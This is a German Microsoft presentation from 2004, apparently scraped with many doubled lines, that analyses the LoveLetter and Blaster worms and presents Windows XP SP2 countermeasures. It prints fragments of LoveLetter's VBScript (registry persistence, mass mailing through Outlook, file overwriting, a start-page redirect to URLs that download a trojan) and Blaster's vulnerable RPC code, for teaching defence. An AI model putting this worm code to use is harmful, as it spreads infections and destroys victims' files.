viren, würmer, sp2 uwe baumann dirk primbs.net community evangelists microsoft deutschland gmbh...
Post on 05-Apr-2015
107 Views
Preview:
TRANSCRIPT
Viren, Würmer, SP2
Uwe BaumannDirk Primbs.NET Community EvangelistsMicrosoft Deutschland GmbHuwebaum@microsoft.comdirkp@microsoft.com
Sicherheit ist eine der größten und wichtigsten Sicherheit ist eine der größten und wichtigsten Aufgaben, die unsere Industrie jemals angehen Aufgaben, die unsere Industrie jemals angehen musste. musste.
Es geht nicht nur darum, einfach ein paar Es geht nicht nur darum, einfach ein paar Sicherheitslöcher zu schließen und weiterzumachen. Sicherheitslöcher zu schließen und weiterzumachen. Die negativen Auswirkungen von Viren und Würmern Die negativen Auswirkungen von Viren und Würmern auf ein akzeptables Niveau herunterzuschrauben auf ein akzeptables Niveau herunterzuschrauben erfordert ein fundamental neues Denken über erfordert ein fundamental neues Denken über Softwarequalität, ständige Verbesserungen bei Tools Softwarequalität, ständige Verbesserungen bei Tools und Prozessen, und anhaltende Investitionen in und Prozessen, und anhaltende Investitionen in widerstandsfähige neue Sicherheitstechnologien, die widerstandsfähige neue Sicherheitstechnologien, die bösartigen oder zerstörerischen Code blocken, bevor bösartigen oder zerstörerischen Code blocken, bevor Schaden entsteht [...]Schaden entsteht [...]
Der technologische Fortschritt in den letzten zwei Der technologische Fortschritt in den letzten zwei Jahrzehnten ist unglaublich, und ist viel zu wichtig, als Jahrzehnten ist unglaublich, und ist viel zu wichtig, als daß wir ein paar Kriminellen erlauben dürfen, uns daß wir ein paar Kriminellen erlauben dürfen, uns davon abzuhalten, die fantastischen Errungenschaften davon abzuhalten, die fantastischen Errungenschaften der Technologie zu genießen.der Technologie zu genießen.
Bill Gates, 31. März 2004Bill Gates, 31. März 2004
Viren, Würmer, TrojanerViren, Würmer, Trojaner
Zwei typische VertreterLoveLetter und Blaster
Wurm InsideSo funktionieren LoveLetter und Blaster
Harte LektionenWarum konnte das geschehen?Aus Schaden wird man klug
Hilfe, mein Code geht nicht mehr!„Kann man das auch ausschalten?“
Zwei typische VertreterLoveLetter und Blaster
Wurm InsideSo funktionieren LoveLetter und Blaster
Harte LektionenWarum konnte das geschehen?Aus Schaden wird man klug
Hilfe, mein Code geht nicht mehr!„Kann man das auch ausschalten?“
Love LetterLove LetterAls die Liebe die Welt regierteAls die Liebe die Welt regierte
VormittagMitarbeiter des philippinischen
Internetproviders „Sky Internet“ bemerken eine drastisch erhöhte Anzahl von Downloads auf ihren Servern. Der Wurm lädt dort einen
Trojaner herunter, der Passwörter ausspioniert und an zwei eMail-Adressen versendet. Der Provider schaltet die betroffenen Server ab.
Quelle: PCWorld.comQuelle: PCWorld.com
Mittwoch, 3. Mai 2000Ein neuer Wurm taucht
auf.Unter den ersten „Patienten“ sind
Microsoft Deutschland, Lucent Technology
Europa und Credit Suisse
7:00 UhrAntivirus-Hersteller
verschicken die ersten Versionen der
Virendefinition an ihre Kunden, aber es ist
bereits zu spät denn…
Ca. 7:00 Uhr... in Melbourne klickt ein Mitarbeiter des
Reiseführer-Verlags „Lonely Planet“ auf das Wurm-Script und verschickt den Wurm an
100 Reiseführer-Autoren in der ganzen Welt…
Mittwoch, 4. Mai 200013:00 Uhr
Der Wurm trifft im Pentagon und bei der CIA ein. Das FBI nimmt die
Ermittlungen auf.
18:40 UhrViele Antivirus-Hersteller
machen Virus-Definitionsfiles zum freien Download über
das Web verfügbar.16:00 Uhr
Der erste Clone taucht auf („Funny Joke“)
Freitag, 5. MaiMittlerweile sind 9 weitere
Varianten im Umlauf, getarnt als Muttertagsmail und als Nachricht des Antiviren-
Herstellers Symantec
Dienstag, 9. MaiVirusmeldungen aus aller Welt gehen zurück. Insgesamt sind jetzt 29 Varianten im Umlauf, eine halbe Million PCs wurden
infiziert.Ab 7 Uhr… und an der Ostküste der USA klicken
Tausende liebeshungrige Büroangestellte nach einem
frustrierenden Wochenende auf die Mail in der Hoffnung auf ein Rendez-Vouz
Donnerstag, 4. Mai 4:12 Uhr
Antivirus-Hersteller in Europa empfangen die ersten Meldungen von Kunden und beginnen um ca.
5:00 Uhr mit der Analyse. Es wird schnell klar: Der Wurm, geschrieben in
VB Script, ist nicht sehr kompliziert, aber extrem
ansteckend.
ReproduktionReproduktion
Verschickt sich als Attachment an eMail-Adressen aus dem Outlook-Addressbuch des BenutzersVerschickt sich über IRC mit Hilfe des DCC Features (Direct Client-to-Client)
Verschickt sich als Attachment an eMail-Adressen aus dem Outlook-Addressbuch des BenutzersVerschickt sich über IRC mit Hilfe des DCC Features (Direct Client-to-Client)
AktionenAktionen
Ersetzt Files mit Kopien des eigenen CodesStartet Download eines TrojanersVerschickt sich selbst über eMailInfiziert (überschreibt) FilesErstellt ein mIRC ScriptVerändert die Startseite des Internet Explorers
Ersetzt Files mit Kopien des eigenen CodesStartet Download eines TrojanersVerschickt sich selbst über eMailInfiziert (überschreibt) FilesErstellt ein mIRC ScriptVerändert die Startseite des Internet Explorers
Inside LoveLetterInside LoveLetter
Analyse des VBS-SkriptsAnalyse des VBS-Skripts
Code: Selbstkopien erstellenCode: Selbstkopien erstellenSet wscr=CreateObject("WScript.Shell")…Set dirwin = fso.GetSpecialFolder(0)Set dirsystem = fso.GetSpecialFolder(1)Set dirtemp = fso.GetSpecialFolder(2)Set c = fso.GetFile(WScript.ScriptFullName)c.Copy(dirsystem&"\MSKernel32.vbs")c.Copy(dirwin&"\Win32DLL.vbs")c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")…regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Run\MSKernel32",dirsystem&"\MSKernel32.vbs"regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
Code: Trojaner downloadenCode: Trojaner downloadenRandomizenum = Int((4 * Rnd) + 1)if num = 1 thenregcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~young1s/[…]HJKhjnjbvYT/WINBUGSFIX.exe"elseif num = 2 thenregcreate "HKCU\Software\Microsoft\Internet Explorer\Main\ Start Page","http://www.skyinet.net/~angelcat/ […]skladjflfd/WIN-BUGSFIX.exe"elseif num = 3 thenregcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~koichi/[…]TRjkcbGRfF/WIN-BUGSFIX.exe"elseif num = 4 thenregcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~chu/[…]sdgfhjjgcb/WIN-BUGSFIX.exe"end if
Code: Massenmail schickenCode: Massenmail schickenset regedit=CreateObject("WScript.Shell")set out=WScript.CreateObject("Outlook.Application")set mapi=out.GetNameSpace("MAPI")
set a=mapi.AddressLists(ctrlists)x=1for ctrentries=1 to a.AddressEntries.Count…set male=out.CreateItem(0)male.Recipients.Add(malead)male.Subject = "ILOVEYOU"male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")male.Send…x=x+1next
Code: Files infizierenCode: Files infizierenset f = fso.GetFolder(folderspec)set fc = f.Filesfor each f1 in fcext=fso.GetExtensionName(f1.path)ext=lcase(ext)s=lcase(f1.name)…elseif(ext="jpg") or (ext="jpeg") thenset ap=fso.OpenTextFile(f1.path,2,true)ap.write vbscopyap.closeset cop=fso.GetFile(f1.path)cop.copy(f1.path&".vbs")fso.DeleteFile(f1.path)…next
Das Ende vom LiedDas Ende vom Lied
10 Milliarden US$ Schaden (geschätzt)Unzählige NachahmerWahrscheinlicher Autor: Philippinischer StudentMotiv: Entweder ein Versehen oder die Rache für eine zurückgewiesene SemesterarbeitVerurteilung des Autors nach damals in den Philippinen geltendem Recht nicht möglich
10 Milliarden US$ Schaden (geschätzt)Unzählige NachahmerWahrscheinlicher Autor: Philippinischer StudentMotiv: Entweder ein Versehen oder die Rache für eine zurückgewiesene SemesterarbeitVerurteilung des Autors nach damals in den Philippinen geltendem Recht nicht möglich
Lektionen aus Love LetterLektionen aus Love Letter
Love Letter vertraute darauf, daß…… der Empfänger Mailattachements öffnet wenn die Email von bekannten Absendern stammt.… der Empfänger ausreichende Rechte hat um von sich selbst Kopien in Systemverzeichnissen zu erstellen.... Mails vollautomatisch verschickt werden können.
Love Letter vertraute darauf, daß…… der Empfänger Mailattachements öffnet wenn die Email von bekannten Absendern stammt.… der Empfänger ausreichende Rechte hat um von sich selbst Kopien in Systemverzeichnissen zu erstellen.... Mails vollautomatisch verschickt werden können.
Maßnahmen IMaßnahmen I
Hinweismeldungen von Office-Applikationen, bevor …
… VBA-Code ausgeführt wird.… Scripts ausgeführt werden.… Outlook automatisiert werden kann.
Hinweismeldungen von Office-Applikationen, bevor …
… VBA-Code ausgeführt wird.… Scripts ausgeführt werden.… Outlook automatisiert werden kann.
Maßnahmen IIMaßnahmen II
Neue Sicherheitsoptionen für die Preview Pane in OutlookAusführbare Attachements werden blockiert:
Mail-Previews laufen in der „Restricted Sites“ Internet Zone
Neue Sicherheitsoptionen für die Preview Pane in OutlookAusführbare Attachements werden blockiert:
Mail-Previews laufen in der „Restricted Sites“ Internet Zone
Windows XP Service Pack 2Windows XP Service Pack 2
Neue Mail-Preview für Outlook ExpressZone „Local Machine“ restriktiver vorkonfiguriert Neue zentrale API zum Handling von Attachements: Attachement Execution Services (AES)
Schnittstelle IAttachementExecuteZentralisiert die Risiko-AbschätzungSteuerbar über Group Policies
Neue Mail-Preview für Outlook ExpressZone „Local Machine“ restriktiver vorkonfiguriert Neue zentrale API zum Handling von Attachements: Attachement Execution Services (AES)
Schnittstelle IAttachementExecuteZentralisiert die Risiko-AbschätzungSteuerbar über Group Policies
Bitte wenden Sie sich an Ihren Administrator Bitte wenden Sie sich an Ihren Administrator
Als Nicht-Administrator wäre es Love Letter nicht möglich gewesen, …
… sich in HKLM\…\Run einzutragen.… in ein Systemverzeichnis zu schreiben.… Betriebssystembestandteile auszutauschen.
Als Nicht-Administrator wäre es Love Letter nicht möglich gewesen, …
… sich in HKLM\…\Run einzutragen.… in ein Systemverzeichnis zu schreiben.… Betriebssystembestandteile auszutauschen.
Ein Tag im Leben eines Nicht-Administrators
Ein Tag im Leben eines Nicht-Administrators
Das Security Problem Software Security PendelDas Security Problem Software Security Pendel
Einfache Benutzung
“Automagic”Alle Features sind ON by default
Große AngriffsflächeOut Of The Box Experience
FeaturesAttacks
Einfache Benutzung
“Automagic”Alle Features sind ON by default
Große AngriffsflächeOut Of The Box Experience
FeaturesAttacks
Usability Usability & &
FeaturesFeatures
Security Security & &
PrivacyPrivacy
Marketing ModeMarketing ModeMarketing ModeMarketing Mode
Das Security Problem Software Security PendelDas Security Problem Software Security Pendel
Geringe “connectivity”Viele SicherheitsdialogeMinimierte Angriffsfläche Oft schwerer zu benutzenNur schwer zu vermarkten
Geringe “connectivity”Viele SicherheitsdialogeMinimierte Angriffsfläche Oft schwerer zu benutzenNur schwer zu vermarkten
Usability Usability & &
FeaturesFeatures
Security Security & &
PrivacyPrivacy
Paranoid ModeParanoid Mode
Das Security ProblemSoftware Security PendelDas Security ProblemSoftware Security Pendel
Kleinere AngriffsflächeWeniger Sicherheits-Dialoge
Transparente EinstellungKonfigurierbarSicher handhabbar!
Security & Privacy als Feature für den Anwender
Kleinere AngriffsflächeWeniger Sicherheits-Dialoge
Transparente EinstellungKonfigurierbarSicher handhabbar!
Security & Privacy als Feature für den Anwender
Usability Usability & &
FeaturesFeatures
Security Security & &
PrivacyPrivacy
OptimumOptimum
BlasterBlasterMach mal Pause!Mach mal Pause!
ReproduktionReproduktion
Wurmcode lädt EXE-Datei „MSBLAST.EXE“ von angreifendem, bereits infizierten System und führt diese lokal ausDie EXE-Datei scannt weitere Systeme und infiziert diese mit dem Wurmcode
Wurmcode lädt EXE-Datei „MSBLAST.EXE“ von angreifendem, bereits infizierten System und führt diese lokal ausDie EXE-Datei scannt weitere Systeme und infiziert diese mit dem Wurmcode
AktionenAktionen
Startet Denial-of-Service Angriff auf http://www.windowsupdate.comBringt Computer zum Absturz (als Nebeneffekt)
Startet Denial-of-Service Angriff auf http://www.windowsupdate.comBringt Computer zum Absturz (als Nebeneffekt)
Inside BlasterInside Blaster
Grundlagen: Buffer OverrunAnalyse der angreifbaren Stelle im Windows-Sourcecode
Grundlagen: Buffer OverrunAnalyse der angreifbaren Stelle im Windows-Sourcecode
Buffer Overrun: Das Prinzip [1] Buffer Overrun: Das Prinzip [1] void main() { char myLongBuffer[256]; myFunction(myBuffer);}
void myFunction(char *myString) { char myShortBuffer[16]; strcpy(myShortBuffer, myString); }
Was passiert, wenn der übergebene String größer als 16 Zeichen ist?Was passiert, wenn der übergebene String größer als 16 Zeichen ist?
Buffer Overrun: Das Prinzip [2] Buffer Overrun: Das Prinzip [2] void main() { char myLongBuffer[256]; myFunction(myLongBuffer);}
StackStack
(bisheriger Stackinhalt)
256MyLongBuffer
Rücksprungadresse
Sonstige Daten
MyShortBuffer 16 Str
ing
sStr
ing
s
void myFunction(char *myString) { char myShortBuffer[16]; strcpy(myShortBuffer, myString); }
Daten sind zu lang !
MyShortBuffer 16256
MyShortBuffer
Gehackte Adresse
Gehackte AdresseViruscode
„Böser“ Inhalt von MyShortBuffer:
Rücksprung an gehackte Adresse…
Virus a
usführen
Virus a
usführen
Sta
ckSta
ck
Code: Blasters AngriffszielCode: Blasters Angriffsziel
error_status_t _RemoteActivation(WCHAR *pwszObjectName, ... ) { *phr = GetServerPath(pwszObjectName, &pwszObjectName); …}HRESULT GetServerPath(WCHAR *pwszPath, WCHAR **pwszServerPath ){ WCHAR * pwszFinalPath = pwszPath; WCHAR wszMachineName[MAX_COMPUTERNAME_LENGTH_FQDN + 1]; hr = GetMachineName(pwszPath, wszMachineName); *pwszServerPath = pwszFinalPath;}HRESULT GetMachineName( WCHAR * pwszPath, WCHAR wszMachineName[MAX_COMPUTERNAME_LENGTH_FQDN + 1]) { pwszServerName = wszMachineName; LPWSTR pwszTemp = pwszPath + 2; while ( *pwszTemp != L'\\' ) *pwszServerName++ = *pwszTemp++; !!!
Port 135 (Z.B. aus dem Internet)Port 135 (Z.B. aus dem Internet)
Ist das wirklich so einfach?Ist das wirklich so einfach?
Ausnützen der Sicherheitslöcher ist nicht trivial!Analyse der Verwundbarkeit
Sourcecode liegt (oft) nicht vor
Virenbaukästen („Kits“) helfen beim Bau einfacher Viren und Trojaner, aber…
Exploits werden immer schwierigerExtrem detaillierte Kentnisse sind notwendigUnmöglich ohne viel Zeit und Wissen
Ausnützen der Sicherheitslöcher ist nicht trivial!Analyse der Verwundbarkeit
Sourcecode liegt (oft) nicht vor
Virenbaukästen („Kits“) helfen beim Bau einfacher Viren und Trojaner, aber…
Exploits werden immer schwierigerExtrem detaillierte Kentnisse sind notwendigUnmöglich ohne viel Zeit und Wissen
Sorgen eines HackersSorgen eines Hackers
Sprungadresse zu eigenem Code finden
„NOP-Sledge“ oder gutes Raten
DLL-Funktionen aufrufenDLL-Basisadresse? Funktions-Einsprungpunkt?
Prozeß abspaltenKeine native Win32-Funktion verfügbar
Platz für Literale ( z.B. Funktionsnamen)
Hashing notwendig
Keine Null im Code erlaubtDecoder-Stub nötig
Sprungadresse zu eigenem Code finden
„NOP-Sledge“ oder gutes Raten
DLL-Funktionen aufrufenDLL-Basisadresse? Funktions-Einsprungpunkt?
Prozeß abspaltenKeine native Win32-Funktion verfügbar
Platz für Literale ( z.B. Funktionsnamen)
Hashing notwendig
Keine Null im Code erlaubtDecoder-Stub nötig
Grrr!
Das Ende vom LiedDas Ende vom Lied
5-10 Millionen US$ Schaden 8 Millionen infizierte Computer Autor immer noch nicht bekanntEinige Nachahmer vor Gericht
5-10 Millionen US$ Schaden 8 Millionen infizierte Computer Autor immer noch nicht bekanntEinige Nachahmer vor Gericht
Lektionen aus BlasterLektionen aus Blaster
Blaster nutzte eine Sicherheitslücke im Betriebssystem ausAktivierte Firewalls hätten Blaster im Vorfeld verhindert, aber…
… schafft es Blaster in ein Unternehmensnetzwerk, helfen nur noch Personal Firewalls auf den einzelnen Systemen
Zum Zeitpunkt der Verbreitung von Blaster gab es bereits seit nahezu einem Monat einen Patch, der aber nicht rechtzeitig eingespielt worden war
Blaster nutzte eine Sicherheitslücke im Betriebssystem ausAktivierte Firewalls hätten Blaster im Vorfeld verhindert, aber…
… schafft es Blaster in ein Unternehmensnetzwerk, helfen nur noch Personal Firewalls auf den einzelnen Systemen
Zum Zeitpunkt der Verbreitung von Blaster gab es bereits seit nahezu einem Monat einen Patch, der aber nicht rechtzeitig eingespielt worden war
Maßnahmen gegen BOsMaßnahmen gegen BOs
Bestimmte C/C++ Kommandos sind besonders anfällig
strcpy, gets, scanf, sprintf, strcat, …
BOs werden in Managed Code durch Laufzeitchecks verhindert.Compilerswitch /GC aktiviert in Visual C/C++ verbessertes Stackhandling
Bestimmte C/C++ Kommandos sind besonders anfällig
strcpy, gets, scanf, sprintf, strcat, …
BOs werden in Managed Code durch Laufzeitchecks verhindert.Compilerswitch /GC aktiviert in Visual C/C++ verbessertes Stackhandling
Nutzloses Wissen SpecialNutzloses Wissen Special
Quelle: West Virginia Office of Miners’ Health, Safety and Quelle: West Virginia Office of Miners’ Health, Safety and Training Training
Bergarbeiter mit Kanarienvogel (Welsh Miner‘s Canary)
Prinzip:Vogel tot =zuviel Methangas
Compilerswitch /GCCompilerswitch /GCStackStack
(bisheriger Stackinhalt)
256MyLongBuffer
Rücksprungadresse
Security Cookie
Str
ing
sStr
ing
s
MyShortBuffer
Sta
ckSta
ck
Prolog: Alloziiert Speicher auf dem Stack für lokale Variablen
sub esp,20h
Epilog: Führt Rücksprung durch
add esp,20h ret
void myFunction(char *myString) { char myShortBuffer[16]; strcpy(myShortBuffer, myString); }
Prolog: Alloziiert Speicher auf dem Stack für lokale Variablen und speichert Zufallswert für Security Cookie (Canary) absub esp,24h mov eax,dword ptr [___security_cookie (408040h)] xor eax,dword ptr [esp+24h] mov dword ptr [esp+20h],eax Epilog: Prüft den Security Cookie (Canary) und führt anchließend Rücksprung durch mov ecx,dword ptr [esp+20h] xor ecx,dword ptr [esp+24h] add esp,24h jmp __security_check_cookie (4010B2h)
MyShortBuffer 16
Vertrauen ist gut, Kontrolle ist besserVertrauen ist gut, Kontrolle ist besser
PatchmanagementDefinition: PatchPatchmanagementDefinition: Patch
Patches beheben gefundene Security Vulnerabilities werden von Microsoft in Sicherheits-Bulletins veröffentlicht (z.B. MS03-47)Patches werden in Rollup-Packages und Service Packs zusammengefasstVulnerabilities werden von Microsoft in 4 Schweregrade eingeteilt
Patches beheben gefundene Security Vulnerabilities werden von Microsoft in Sicherheits-Bulletins veröffentlicht (z.B. MS03-47)Patches werden in Rollup-Packages und Service Packs zusammengefasstVulnerabilities werden von Microsoft in 4 Schweregrade eingeteilt
Patchmanagement Enstehung des Blaster WurmsPatchmanagement Enstehung des Blaster Wurms
Schwachstelle entdeckt / Start der Patchentwicklung
Bulletin & Patch Verfügbar
Bisher kein Angriff
Angriffs-Codewird veröffentlicht
Wurm infiziert die Welt
1. Juli 03 16. Juli 03 25. Juli 03 11. August 03
ReportReport Schwachstelle in Schwachstelle in
RPC/DDOM RPC/DDOM aufgedecktaufgedeckt
MS startet den MS startet den höchsten Notfall-höchsten Notfall-prozess Levelprozess Level
BulletinBulletin MS03-026 wir an MS03-026 wir an
Kunden ausgeliefertKunden ausgeliefert Kontinuierliche Kontinuierliche
Kommunikation mit Kommunikation mit Analysten, Presse, Analysten, Presse, Community, Partner, Community, Partner, RegierungsbehördenRegierungsbehörden
ExploitExploit X-focus (Chinesische X-focus (Chinesische
Security-Spezialisten) Security-Spezialisten) veröffentlicht Angriffs-veröffentlicht Angriffs-ToolTool
MS maximiert die MS maximiert die Anstrengungen, alle Anstrengungen, alle Kunden zu informierenKunden zu informieren
WormWorm Blaster Wurm entdeckt Blaster Wurm entdeckt Varianten und andere Varianten und andere
Viren schlagen Viren schlagen gemeinsam zu (z.B. gemeinsam zu (z.B. “SoBig”)“SoBig”)
BlasterBlaster zeigt das komplexe Zusammenspiel zwischen zeigt das komplexe Zusammenspiel zwischen Sicherheitsforschung, Softwarehersteller und HackernSicherheitsforschung, Softwarehersteller und Hackern
PatchmanagementReaktionszeitPatchmanagementReaktionszeit
Zeitspanne zwischen erscheinen des Patches und Auftreten eines Exploits sinkt Exploits werden intelligenterAnsatz Patch Management reicht nichtNeue Techniken müssen entwickelt werden
Zeitspanne zwischen erscheinen des Patches und Auftreten eines Exploits sinkt Exploits werden intelligenterAnsatz Patch Management reicht nichtNeue Techniken müssen entwickelt werden
151151180180
331331
Blaster
Blaster
Welchia/
Welchia/ NachiNachi
NimdaNimda
2525
SQL SQL
Slammer
Slammer
Tage zwischen Patch und AngriffTage zwischen Patch und Angriff
Windows XP SP2Windows XP SP2
Verbessertes PatchmanagementAutomatische zeitgesteuerte Installation Priorisierung beim Patch-DownloadReduzierte Patch-Größe mit Delta-PatchingGleiche Scanning-Engine für alle Tools
“hot patching” TechnologieReduzierte Anzahl von Reboots Restart Explorer und einige SVCHOST Prozesse an statt kompletten Reboot
Verbessertes PatchmanagementAutomatische zeitgesteuerte Installation Priorisierung beim Patch-DownloadReduzierte Patch-Größe mit Delta-PatchingGleiche Scanning-Engine für alle Tools
“hot patching” TechnologieReduzierte Anzahl von Reboots Restart Explorer und einige SVCHOST Prozesse an statt kompletten Reboot
Windows XP SP2Windows XP SP2
Execution Protection (no-execute, NX)Speicher wird als Datenspeicher markiertDer Versuch, im NX-Bereich Code auszuführen führt zu einer ExceptionMuß von Hardware unterstützt werden
Execution Protection (no-execute, NX)Speicher wird als Datenspeicher markiertDer Versuch, im NX-Bereich Code auszuführen führt zu einer ExceptionMuß von Hardware unterstützt werden
Internet Connection FirewallInternet Connection FirewallAb SP2 ist die ICF “ON by default”
Boot time protectionVerbesserte Konfigurationsmöglichkeiten
Group Policy, KommandozeileVerbesserte BenutzeroberflächeProgrammatisch: INetFwV4AuthorizedApplication, INetFwV4AuthorizedApplications, INetFwV4Mgr, INetFwV4Policy, INetFwV4Profile
Ab SP2 ist die ICF “ON by default” Boot time protectionVerbesserte Konfigurationsmöglichkeiten
Group Policy, KommandozeileVerbesserte BenutzeroberflächeProgrammatisch: INetFwV4AuthorizedApplication, INetFwV4AuthorizedApplications, INetFwV4Mgr, INetFwV4Policy, INetFwV4Profile
Internet Connection Firewall IIInternet Connection Firewall IIDrei Betriebsmodi
Aktiviert (Standard)Alle eingehende Verbindungen werden blockiert, Ausnahme: Für in einer „White List“ erfasste Programme werden Ports bei Bedarf geöffnetAktiviert - keine Ausnahmen„Shielded Mode“, es werden keine eingehenden Verbindungen zugelassenDeaktiviert
Drei BetriebsmodiAktiviert (Standard)Alle eingehende Verbindungen werden blockiert, Ausnahme: Für in einer „White List“ erfasste Programme werden Ports bei Bedarf geöffnetAktiviert - keine Ausnahmen„Shielded Mode“, es werden keine eingehenden Verbindungen zugelassenDeaktiviert
Windows XP SP2 – Weitere ÄnderungenWindows XP SP2 – Weitere Änderungen
Unterbindung von anonymen RPC-AufrufenNeuer Registry-Key steuert das Verhalten: \\HKLM\SOFTWARE\Policies\Microsoft\Windows NT\RPC\RestrictRemoteClients
RPC_RESTRICT_REMOTE_CLIENT_NONE (0) – bisheriges VerhaltenRPC_RESTRICT_REMOTE_CLIENT_DEFAULT (1) – Anonyme Zugriffe werden zurückgewiesen. StandarteinstellungRPC_RESTRICT_REMOTE_CLIENT_HIGH (2) – genauso wie zuvor, mit der Ausnahme, daß das RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH flag keine Wirkung mehr hat.
DCOM: Globale Konfiguration von ZugriffsrechtenDie meisten lokalen Szenarien funktionieren ohne ÄnderungRemote: Nur Administratoren haben by default das Recht Applikationen zu aktivieren (Activation) und zu starten (Launch)
Unterbindung von anonymen RPC-AufrufenNeuer Registry-Key steuert das Verhalten: \\HKLM\SOFTWARE\Policies\Microsoft\Windows NT\RPC\RestrictRemoteClients
RPC_RESTRICT_REMOTE_CLIENT_NONE (0) – bisheriges VerhaltenRPC_RESTRICT_REMOTE_CLIENT_DEFAULT (1) – Anonyme Zugriffe werden zurückgewiesen. StandarteinstellungRPC_RESTRICT_REMOTE_CLIENT_HIGH (2) – genauso wie zuvor, mit der Ausnahme, daß das RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH flag keine Wirkung mehr hat.
DCOM: Globale Konfiguration von ZugriffsrechtenDie meisten lokalen Szenarien funktionieren ohne ÄnderungRemote: Nur Administratoren haben by default das Recht Applikationen zu aktivieren (Activation) und zu starten (Launch)
Was tun, wenn nichts mehr geht?Was tun, wenn nichts mehr geht?
“Security is designed to make your system not work” (Michael
Howard)
FazitFazit
Viele Viren benutzen einfache Mechanismen um sich zu Systemen Zugang zu verschaffenDurch gezielte Maßnahmen kann die Anfälligkeit einer Applikation bzw. eines Systems deutlich gesenkt werden
Viele Viren benutzen einfache Mechanismen um sich zu Systemen Zugang zu verschaffenDurch gezielte Maßnahmen kann die Anfälligkeit einer Applikation bzw. eines Systems deutlich gesenkt werden
© 2004 Microsoft Corporation. All rights reserved.© 2004 Microsoft Corporation. All rights reserved.This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
ReferenzenReferenzen
Marshall Brain: “How Stuff Works: Computer Viruses”http://www.howstuffworks.com/virus.htmUlf Larson: „VBS.LoveLetter: A Study of the LoveLetter worm“http://www.ce.chalmers.se/undergraduate/D/EDA261/03/oh03/oh_F05_loveletter_4pp.pdf
Marshall Brain: “How Stuff Works: Computer Viruses”http://www.howstuffworks.com/virus.htmUlf Larson: „VBS.LoveLetter: A Study of the LoveLetter worm“http://www.ce.chalmers.se/undergraduate/D/EDA261/03/oh03/oh_F05_loveletter_4pp.pdf
ReferenzenReferenzen
Slipstick Systems : „Protecting Microsoft Outlook against Viruses“http://www.slipstick.com/outlook/antivirus.htmBill Gates: „Microsoft Progress Report: Security“ http://www.microsoft.com/mscorp/execmail/2004/03-31security-print.asp
Slipstick Systems : „Protecting Microsoft Outlook against Viruses“http://www.slipstick.com/outlook/antivirus.htmBill Gates: „Microsoft Progress Report: Security“ http://www.microsoft.com/mscorp/execmail/2004/03-31security-print.asp
ReferenzenReferenzen
PC World: "When Love Came to Town: A Virus Investigation“http://www.pcworld.com/news/article/0,aid,33392,00.aspXP Service Pack 2 for Developershttp://msdn.microsoft.com/security/productinfo/xpsp2/default.aspx
PC World: "When Love Came to Town: A Virus Investigation“http://www.pcworld.com/news/article/0,aid,33392,00.aspXP Service Pack 2 for Developershttp://msdn.microsoft.com/security/productinfo/xpsp2/default.aspx
ReferenzenReferenzen
Microsoft Developer Security Centerhttp://msdn.microsoft.com/security/Microsoft Security Centerhttp://www.microsoft.com/security/Compiler Security Checks in Depthhttp://msdn.microsoft.com/library/en-us/dv_vstechart/html/vctchcompilersecuritychecksindepth.asp
Microsoft Developer Security Centerhttp://msdn.microsoft.com/security/Microsoft Security Centerhttp://www.microsoft.com/security/Compiler Security Checks in Depthhttp://msdn.microsoft.com/library/en-us/dv_vstechart/html/vctchcompilersecuritychecksindepth.asp
ReferenzenReferenzen
Microsoft Baseline Security Analyzerhttp://www.microsoft.com/technet/security/tools/mbsahome.mspxMicrosoft Compatibility Toolkit (Application Verifier)http://www.microsoft.com/downloads/details.aspx?FamilyID=7fc46855-b8a4-46cd-a236-3159970fde94&displaylang=enfxCophttp://www.gotdotnet.com/team/fxcop/
Microsoft Baseline Security Analyzerhttp://www.microsoft.com/technet/security/tools/mbsahome.mspxMicrosoft Compatibility Toolkit (Application Verifier)http://www.microsoft.com/downloads/details.aspx?FamilyID=7fc46855-b8a4-46cd-a236-3159970fde94&displaylang=enfxCophttp://www.gotdotnet.com/team/fxcop/
ReferenzenReferenzen
Developing Software with Non-Administrative privilegeshttp://msdn.microsoft.com/library/en-us/dv_vstechart/html/tchdevelopingsoftwareinvisualstudionetwithnon-administrativeprivileges.asp West Virginia Office for Mine Safety: Historic Photoshttp://www.wvminesafety.org/histphoto.html
Developing Software with Non-Administrative privilegeshttp://msdn.microsoft.com/library/en-us/dv_vstechart/html/tchdevelopingsoftwareinvisualstudionetwithnon-administrativeprivileges.asp West Virginia Office for Mine Safety: Historic Photoshttp://www.wvminesafety.org/histphoto.html
top related